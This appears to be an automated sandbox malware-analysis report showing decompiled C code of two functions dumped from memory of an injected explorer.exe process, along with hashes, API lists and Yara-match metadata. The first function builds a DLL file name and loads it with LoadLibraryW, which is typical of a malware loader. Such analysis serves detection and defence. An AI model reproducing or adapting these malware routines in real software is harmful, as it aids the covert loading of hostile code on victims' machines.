                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 731336ac93f345b1d3558f8a687b4a73c4c5f369d82e875bd9d285cec12308a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D12671A007009FEB28CF6DD9C0A6AB7E6FF98384B14892DE99AC7701D731E945CB54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8D218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E02F8D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x2f9f81c; // 0x2fb0000
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E02F89DF2(_t50, 0x392);
					_t66 =  *0x2f9f81c; // 0x2fb0000
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E02F89E51( &_v140, 0x40, L"%08x", E02F8E2C5(_t66 + 0xb0, E02F8A43D(_t66 + 0xb0), 0));
					_t20 =  *0x2f9f81c; // 0x2fb0000
					asm("sbb eax, eax");
					_t25 = E02F89DF2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000a0b) + 0xf8);
					_t26 =  *0x2f9f81c; // 0x2fb0000
					_t68 = E02F89A5A(_t26 + 0x1020);
					_v12 = _t68;
					E02F88BAF( &_v8);
					_t32 =  *0x2f9f81c; // 0x2fb0000
					_t34 = E02F89A5A(_t32 + 0x122a);
					 *0x2f9f91c = _t34;
					_t35 =  *0x2f9f818; // 0x508f6c8
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x2f9c9a0,  &_v140, ".", L"dll", 0, 0x2f9c9a0, _t25, 0x2f9c9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x2f9f91c);
					 *0x2f9f914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E02F8F011(0x2f9cb8c, _t60);
					}
					 *0x2f9f918 = _t38;
					E02F88BF4( &_v12, 0xfffffffe);
					E02F88D6D( &_v140, 0, 0x80);
					if( *0x2f9f918 != 0) {
						goto L10;
					} else {
						E02F88BF4(0x2f9f91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x2f9f918 == 0) {
						_t46 =  *0x2f9f850; // 0x508f808
						 *0x2f9f918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                                              0x02f8d218
                                                                                                                                                                                              0x02f8d218
                                                                                                                                                                                              0x02f8d218
                                                                                                                                                                                              0x02f8d21b
                                                                                                                                                                                              0x02f8d227
                                                                                                                                                                                              0x02f8d232
                                                                                                                                                                                              0x02f8d24e
                                                                                                                                                                                              0x02f8d253
                                                                                                                                                                                              0x02f8d25c
                                                                                                                                                                                              0x02f8d25e
                                                                                                                                                                                              0x02f8d266
                                                                                                                                                                                              0x02f8d287
                                                                                                                                                                                              0x02f8d28c
                                                                                                                                                                                              0x02f8d299
                                                                                                                                                                                              0x02f8d2a6
                                                                                                                                                                                              0x02f8d2b4
                                                                                                                                                                                              0x02f8d2c5
                                                                                                                                                                                              0x02f8d2cb
                                                                                                                                                                                              0x02f8d2ce
                                                                                                                                                                                              0x02f8d2e5
                                                                                                                                                                                              0x02f8d2f1
                                                                                                                                                                                              0x02f8d2f9
                                                                                                                                                                                              0x02f8d300
                                                                                                                                                                                              0x02f8d306
                                                                                                                                                                                              0x02f8d312
                                                                                                                                                                                              0x02f8d318
                                                                                                                                                                                              0x02f8d31f
                                                                                                                                                                                              0x02f8d332
                                                                                                                                                                                              0x02f8d321
                                                                                                                                                                                              0x02f8d321
                                                                                                                                                                                              0x02f8d324
                                                                                                                                                                                              0x02f8d32a
                                                                                                                                                                                              0x02f8d32f
                                                                                                                                                                                              0x02f8d334
                                                                                                                                                                                              0x02f8d33f
                                                                                                                                                                                              0x02f8d351
                                                                                                                                                                                              0x02f8d363
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d365
                                                                                                                                                                                              0x02f8d36c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d372
                                                                                                                                                                                              0x02f8d373
                                                                                                                                                                                              0x02f8d373
                                                                                                                                                                                              0x02f8d37a
                                                                                                                                                                                              0x02f8d37c
                                                                                                                                                                                              0x02f8d381
                                                                                                                                                                                              0x02f8d381
                                                                                                                                                                                              0x02f8d386
                                                                                                                                                                                              0x02f8d38a
                                                                                                                                                                                              0x02f8d38a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 2889e648d7493c0a28d6e908a501d642a556a4d2a0cf8e65e53c2e3833736f69
                                                                                                                                                                                              • Instruction ID: ae242531804975378a4c7af91c38999cfc03a458a7347434c8a9651bb07d6b20
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2889e648d7493c0a28d6e908a501d642a556a4d2a0cf8e65e53c2e3833736f69
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB3196B2F80108BFEB20BB68EC85FAAB3ADDB453D4F508635F205D3180DA7499558B64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F93674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E02F93674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E02F9358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E02F8A43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x2f9cf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x2f9cf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L02F98935();
				return _t29 - _t22;
			}

















                                                                                                                                                                                              0x02f93674
                                                                                                                                                                                              0x02f9367f
                                                                                                                                                                                              0x02f93686
                                                                                                                                                                                              0x02f9368d
                                                                                                                                                                                              0x02f93693
                                                                                                                                                                                              0x02f9369b
                                                                                                                                                                                              0x02f9369c
                                                                                                                                                                                              0x02f9369e
                                                                                                                                                                                              0x02f936a3
                                                                                                                                                                                              0x02f936ab
                                                                                                                                                                                              0x02f936ab
                                                                                                                                                                                              0x02f936ae
                                                                                                                                                                                              0x02f936b2
                                                                                                                                                                                              0x02f936a5
                                                                                                                                                                                              0x02f936a5
                                                                                                                                                                                              0x02f936a9
                                                                                                                                                                                              0x02f936ab
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f936ab
                                                                                                                                                                                              0x02f936a9
                                                                                                                                                                                              0x02f936bb
                                                                                                                                                                                              0x02f936c4
                                                                                                                                                                                              0x02f936c9
                                                                                                                                                                                              0x02f936cc
                                                                                                                                                                                              0x02f936cf
                                                                                                                                                                                              0x02f936d2
                                                                                                                                                                                              0x02f936d4
                                                                                                                                                                                              0x02f936d4
                                                                                                                                                                                              0x02f936da
                                                                                                                                                                                              0x02f936dd
                                                                                                                                                                                              0x02f936e0
                                                                                                                                                                                              0x02f936e3
                                                                                                                                                                                              0x02f936e8
                                                                                                                                                                                              0x02f936ea
                                                                                                                                                                                              0x02f936ea
                                                                                                                                                                                              0x02f936f0
                                                                                                                                                                                              0x02f936fc
                                                                                                                                                                                              0x02f936fe
                                                                                                                                                                                              0x02f9370a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 02F936BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 02F936FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: 9ea78d6faed0c6cb9483393718655d9325f2c7b48f4fcbf82b3434b0066614c1
                                                                                                                                                                                              • Instruction ID: 7bba58303ef6e20d1f1b7fd08fe7c244ed417d8a6d269f5fc83734d22a831ac0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea78d6faed0c6cb9483393718655d9325f2c7b48f4fcbf82b3434b0066614c1
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF112532E0028D9BDF009F69E80459EBFB5FF94390B2249A9DA1192281EB31C1648B81
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%